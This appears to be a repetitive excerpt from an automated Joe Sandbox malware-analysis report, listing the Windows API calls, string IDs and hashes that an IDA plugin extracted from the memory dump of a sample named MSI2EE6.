                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandle$Process32$CreateFirstNextOpenProcessSnapshotToolhelp32
                                                                          • String ID:
                                                                          • API String ID: 708755948-0
                                                                          • Opcode ID: 316d9e378437460514194fc362c5a8be751311cf620912543a905c1661dd52bb
                                                                          • Instruction ID: a1d62bb95ae82ebd19e73e0d5b1148cf208ca30bd3100638221b6bb6b95d9edd
                                                                          • Opcode Fuzzy Hash: 316d9e378437460514194fc362c5a8be751311cf620912543a905c1661dd52bb
                                                                          • Instruction Fuzzy Hash: 2FA14B719052599FDB20DF68DD4CBDDBBB8EB04314F1482DAE819A7290DBB4AE84CF50
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: __floor_pentium4
                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                          • API String ID: 4168288129-2761157908
                                                                          • Opcode ID: ae306447d272facec4f37a33e60cc40d66820f209008740bb5a2ca721f333cb3
                                                                          • Instruction ID: b54a466b9783ad7537fdf1b5f99e79515697ceff0c1755bc41fd5831dad1e42b
                                                                          • Opcode Fuzzy Hash: ae306447d272facec4f37a33e60cc40d66820f209008740bb5a2ca721f333cb3
                                                                          • Instruction Fuzzy Hash: 7FD20672E08629CBDB75CE28DD807EAB7F5EB84305F5441EAD44DA7240DB74AE818F81
                                                                          APIs
                                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,00B144C7,00000002,00000000,?,?,?,00B144C7,?,00000000), ref: 00B14242
                                                                          • GetLocaleInfoW.KERNEL32(?,20001004,00B144C7,00000002,00000000,?,?,?,00B144C7,?,00000000), ref: 00B1426B
                                                                          • GetACP.KERNEL32(?,?,00B144C7,?,00000000), ref: 00B14280
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: InfoLocale
                                                                          • String ID: ACP$OCP
                                                                          • API String ID: 2299586839-711371036
                                                                          • Opcode ID: 98f1c1a23d31900396ccd0cf8d7b9c2d6a8c7b4cb4f7dc098bddd2e023717df6
                                                                          • Instruction ID: 90afb5993026f5e3081dd9ddd0e7da7d7803a031ff76b8a7cbfb34546267bf64
                                                                          • Opcode Fuzzy Hash: 98f1c1a23d31900396ccd0cf8d7b9c2d6a8c7b4cb4f7dc098bddd2e023717df6
                                                                          • Instruction Fuzzy Hash: 1721A172A20201A6DB348F54D901BD776E6EBA4B51BE685A4F91AEB110E732DDC1C390
                                                                          APIs
                                                                            • Part of subcall function 00B0C819: GetLastError.KERNEL32(?,00000008,00B10950), ref: 00B0C81D
                                                                            • Part of subcall function 00B0C819: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B0C8BF
                                                                          • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00B1448A
                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 00B144D3
                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 00B144E2
                                                                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00B1452A
                                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00B14549
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                          • String ID:
                                                                          • API String ID: 415426439-0
                                                                          • Opcode ID: f91d654f6832b8a5a0b9a525983c51157a4417490816e943b708af336b75728a
                                                                          • Instruction ID: 16728fe72e7bd73a4212443b4d961541376ed628b9171b180ace1d66e7bfd574
                                                                          • Opcode Fuzzy Hash: f91d654f6832b8a5a0b9a525983c51157a4417490816e943b708af336b75728a
                                                                          • Instruction Fuzzy Hash: 63517371900215ABDB20DFA5DC81BFE77F8FF49700F9444A9E915E7290EB70DA848B61
                                                                          APIs
                                                                            • Part of subcall function 00B0C819: GetLastError.KERNEL32(?,00000008,00B10950), ref: 00B0C81D
                                                                            • Part of subcall function 00B0C819: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B0C8BF
                                                                          • GetACP.KERNEL32(?,?,?,?,?,?,00B0B314,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00B13AC0
                                                                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00B0B314,?,?,?,00000055,?,-00000050,?,?), ref: 00B13AEB
                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00B13C54
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                          • String ID: utf8
                                                                          • API String ID: 607553120-905460609
                                                                          • Opcode ID: 94022b75f44eb02d8a961decf5930bb3d1d2a0ec0fc6f2cf99dfd3d761913496
                                                                          • Instruction ID: 064d6151c421c61e1d9304eb6e7f0f4592a9560372242f34cb8193446eaede54
                                                                          • Opcode Fuzzy Hash: 94022b75f44eb02d8a961decf5930bb3d1d2a0ec0fc6f2cf99dfd3d761913496
                                                                          • Instruction Fuzzy Hash: 5F71F571608306AADB24AB78CC86BEB77E8EF44B10F5444B9F945E7181FB70EA808751
                                                                          APIs
                                                                          • LoadResource.KERNEL32(00000000,00000000,5E20FB0F,00000001,00000000,?,00000000,00B1A200,000000FF,?,00AD1D3C,?,?,?,00000000,?), ref: 00AD1DBB
                                                                          • LockResource.KERNEL32(00000000,?,00AD1D3C,?,?,?,00000000,?,-00000010,00B1A1E0,000000FF,?,00AD2058,?,00000000,00B1A22D), ref: 00AD1DC6
                                                                          • SizeofResource.KERNEL32(00000000,00000000,?,00AD1D3C,?,?,?,00000000,?,-00000010,00B1A1E0,000000FF,?,00AD2058,?,00000000), ref: 00AD1DD4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: Resource$LoadLockSizeof
                                                                          • String ID: @"vpD$v
                                                                          • API String ID: 2853612939-3189754618
                                                                          • Opcode ID: 81f39013b104e2cdc724d997f586918afd0ea4e9ecd0bc9c063cb236e2a27e33
                                                                          • Instruction ID: 9e5a42c2d21260375b30ae0cf12d6d36fa3d113fb2012c41e4c59ea126f50ff8
                                                                          • Opcode Fuzzy Hash: 81f39013b104e2cdc724d997f586918afd0ea4e9ecd0bc9c063cb236e2a27e33
                                                                          • Instruction Fuzzy Hash: 0A119432A04664ABC7249F59DC45AB6F7E8E789B21F01492FEC56D3350EA359C508690
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: _strrchr
                                                                          • String ID:
                                                                          • API String ID: 3213747228-0
                                                                          • Opcode ID: 9d3b857c03dc2dea600ebcc52408cceb5c43a748acc98c2b1de5e99707f341c3
                                                                          • Instruction ID: f20532543b7778019da181812fc6afb4f9a304b516eea82f118c16ce0cf50575
                                                                          • Opcode Fuzzy Hash: 9d3b857c03dc2dea600ebcc52408cceb5c43a748acc98c2b1de5e99707f341c3
                                                                          • Instruction Fuzzy Hash: D5B15A729042469FDB158F68C891BFEBFE5EF55340F1482EAE905AB2C1D3349D06CBA1
                                                                          APIs
                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00AFA11D
                                                                          • IsDebuggerPresent.KERNEL32 ref: 00AFA1E9
                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00AFA202
                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00AFA20C
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                          • String ID:
                                                                          • API String ID: 254469556-0
                                                                          • Opcode ID: adaf711ade4ab3630096e3b714920cebfe75ccf9a9bb91c4656629b8c914efc9
                                                                          • Instruction ID: 2a7099bd0366481f45cee9d597a3f4e2a0d0a107d9aaa5107bdf814f829702c3
                                                                          • Opcode Fuzzy Hash: adaf711ade4ab3630096e3b714920cebfe75ccf9a9bb91c4656629b8c914efc9
                                                                          • Instruction Fuzzy Hash: E731D7B5D0122C9BDF21DFA4D9897DDBBF8AF18300F1041EAE50DAB250EB719A858F45
                                                                          APIs
                                                                          • GetLocaleInfoEx.KERNEL32(!x-sys-default-locale,20000001,00000000,00000002,?,?,00AD32E0,?), ref: 00AE27D5
                                                                          • FormatMessageA.KERNEL32(00001300,00000000,5E20FB0F,00000000,00000000,00000000,00000000,?,?,?,00AD32E0,?), ref: 00AE27FC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: FormatInfoLocaleMessage
                                                                          • String ID: !x-sys-default-locale
                                                                          • API String ID: 4235545615-2729719199
                                                                          • Opcode ID: 29329966d0a34e81f01b4eba9507b3d52bf83e2d21986025ceee342afe0606b2
                                                                          • Instruction ID: 3cd9c3b50a634545b7e4fe236051db69eb37457eadd19097d0a987de65f28270
                                                                          • Opcode Fuzzy Hash: 29329966d0a34e81f01b4eba9507b3d52bf83e2d21986025ceee342afe0606b2
                                                                          • Instruction Fuzzy Hash: 37F03076110104BFFB049B95CC4AEEB7BACEB09390B408029F906E6050E6B0AE00D770
                                                                          APIs
                                                                            • Part of subcall function 00B0C819: GetLastError.KERNEL32(?,00000008,00B10950), ref: 00B0C81D
                                                                            • Part of subcall function 00B0C819: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B0C8BF
                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B13E74
                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B13EBE
                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B13F84
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: InfoLocale$ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 661929714-0
                                                                          • Opcode ID: 50d00322b0d0934ff208232bac63be5f8368a19fd40a3b3121ceac032666c16d
                                                                          • Instruction ID: 94ab5e6d4b48d37945151414b5a32c2b0f9baa494da46e8d520974e29d4387a0
                                                                          • Opcode Fuzzy Hash: 50d00322b0d0934ff208232bac63be5f8368a19fd40a3b3121ceac032666c16d
                                                                          • Instruction Fuzzy Hash: E7619E719002079BDB289F29CC86BFA77E8EF09700F5080A9EE15CA585FB34DAD5CB50
                                                                          APIs
                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00AFE23E
                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00AFE248
                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00AFE255
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                          • String ID:
                                                                          • API String ID: 3906539128-0
                                                                          • Opcode ID: fc10f70f438a7dbe4978b12fe7bfe4ccd2af1a4a3e3ab155ab71dc0cf1adc6e7
                                                                          • Instruction ID: 8c6c3e4ae52bb808a488fdb89ad244babac349a7e2eab1acee8528fa27a9b4bc
                                                                          • Opcode Fuzzy Hash: fc10f70f438a7dbe4978b12fe7bfe4ccd2af1a4a3e3ab155ab71dc0cf1adc6e7
                                                                          • Instruction Fuzzy Hash: F231C4B590122CABCB21DF64D9887DDB7B8AF58310F5041EAE51CA7250EB309B818F45
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7a952be54357ecb580acf803ffddb277c85843e58bc670088b866b3adb609f98
                                                                          • Instruction ID: 3da07e0a9425b76d938dd2a8fc81d139185def341cbeba92628b263d012fe322
                                                                          • Opcode Fuzzy Hash: 7a952be54357ecb580acf803ffddb277c85843e58bc670088b866b3adb609f98
                                                                          • Instruction Fuzzy Hash: 22F11D71E016199FDF24CF69D8806AEBBF1FF88324F1582A9E815A7790D730AD458F90
                                                                          APIs
                                                                          • GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00B0EFE9,00000000,00000000,00000000), ref: 00B0EEA8
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: InformationTimeZone
                                                                          • String ID:
                                                                          • API String ID: 565725191-0
                                                                          • Opcode ID: c5b7b03977f83ff43cdd74815be567c9d1d9e5cd9a340cf4af80e88724a76644
                                                                          • Instruction ID: 3a60135ffa11fb4ee8cf413d32684252cde2bed0fdd77be9e8b968a055c89cbc
                                                                          • Opcode Fuzzy Hash: c5b7b03977f83ff43cdd74815be567c9d1d9e5cd9a340cf4af80e88724a76644
                                                                          • Instruction Fuzzy Hash: C0C11A72A00115ABDB20AF64CC42ABE7FF9EF04750F1449A6F921AB2D1EB31DE41C790
                                                                          APIs
                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00B0F43E,?,?,00000008,?,?,00B19A60,00000000), ref: 00B0F670
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionRaise
                                                                          • String ID:
                                                                          • API String ID: 3997070919-0
                                                                          • Opcode ID: f0eb034ec3d29eb699aa63cde6841e439aba608f3313495d3de6cdf4f85dc6bd
                                                                          • Instruction ID: 6b6449c95a03f70970e149559664594607dc82b1322c02a29663dbb9ee3fc024
                                                                          • Opcode Fuzzy Hash: f0eb034ec3d29eb699aa63cde6841e439aba608f3313495d3de6cdf4f85dc6bd
                                                                          • Instruction Fuzzy Hash: 30B13D3161060ADFD725CF28C486A657FE0FF45364F2586A8E899CF6E1C735E992CB40
                                                                          APIs
                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00AF9D72
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID: FeaturePresentProcessor
                                                                          • String ID:
                                                                          • API String ID: 2325560087-0
                                                                          • Opcode ID: 89717eac410be7af2f33f8f1057a90f20047fc91c2c3b691214d493e9fe7c17d
                                                                          • Instruction ID: 62d0a95f2ab094a863f7462a48234e38321a0cb675a99e13b0447ced5c9a0ba7
                                                                          • Opcode Fuzzy Hash: 89717eac410be7af2f33f8f1057a90f20047fc91c2c3b691214d493e9fe7c17d
                                                                          • Instruction Fuzzy Hash: 9F515CB19052198FEB18CFA9D9827BEBBF4FB48310F24946AE605EB260D774D940CF50
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 0
                                                                          • API String ID: 0-4108050209
                                                                          • Opcode ID: 4456965107f291d0ceed38c018ec13822db890c276edee352d7ee37d438189a7
                                                                          • Instruction ID: b0b14d61902dc0411f1dc1ffb484b8809309a085ce0700ccd5af7f0fc24f7d62
                                                                          • Opcode Fuzzy Hash: 4456965107f291d0ceed38c018ec13822db890c276edee352d7ee37d438189a7
                                                                          • Instruction Fuzzy Hash: CEE14A74A007058FCB2CDF6CC590AAABBF1FF49314B248A99D4569B2D1D730EE46CB61
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ed1a77ccd94fefa1ce46fd3ec6db4d43e070451e25e8f97c380f3aec8bbc3210
                                                                          • Instruction ID: 0e8ad8f20fbb8902d6b9ab9c1b409a7f2587ea669a9ae7ab05cf8d87aa257491
                                                                          • Opcode Fuzzy Hash: ed1a77ccd94fefa1ce46fd3ec6db4d43e070451e25e8f97c380f3aec8bbc3210
                                                                          • Instruction Fuzzy Hash: 1631E672900219AFCB20EFB8CCC8DFBB7BDEB84314F544699F90597144EA70AD808B50
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580768067.0000000000B35000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_ad0000_MSI2EE6.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 0
                                                                          • API String ID: 0-4108050209
                                                                          • Opcode ID: 5f316fc464fa9f1e1ff5fc8f26c3adfed564d9023e926d2f89d66421f2ed5d69
                                                                          • Instruction ID: 765ea20513cf9c662c51e011904a2bc2bb8e0ec2a3dbfb8850119ddb115265af
                                                                          • Opcode Fuzzy Hash: 5f316fc464fa9f1e1ff5fc8f26c3adfed564d9023e926d2f89d66421f2ed5d69
                                                                          • Instruction Fuzzy Hash: BCC1AA70A0060A8FCB2DCFACC8946AEBFF5FB55304B284A99D4579B3E1C721AD45CB51
                                                                          APIs
                                                                            • Part of subcall function 00B0C819: GetLastError.KERNEL32(?,00000008,00B10950), ref: 00B0C81D
                                                                            • Part of subcall function 00B0C819: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B0C8BF
                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B140D4
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.4579143574.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                          • Associated: 00000004.00000002.4579101998.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580502689.0000000000B1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000004.00000002.4580606899.0000000000B31000.00000004.00000001.01000000.00000003.sdmpDownload File
